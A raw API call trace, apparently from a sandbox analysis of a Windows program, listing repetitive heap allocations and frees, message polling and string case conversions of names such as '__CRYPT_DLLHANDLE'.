[0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0177.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0177.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0177.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.229] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0177.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2778 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0177.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0177.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.229] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0177.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0177.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0177.230] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0177.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0177.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0177.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.231] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0177.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0177.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0177.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0177.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0177.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0177.232] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0177.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.232] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd570 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0177.232] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0177.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0177.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0177.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0177.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0177.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0177.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0177.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0177.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0177.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0177.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0177.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0177.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0177.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0177.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0177.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0177.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0177.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0177.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0177.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0177.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0177.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0177.236] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0177.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 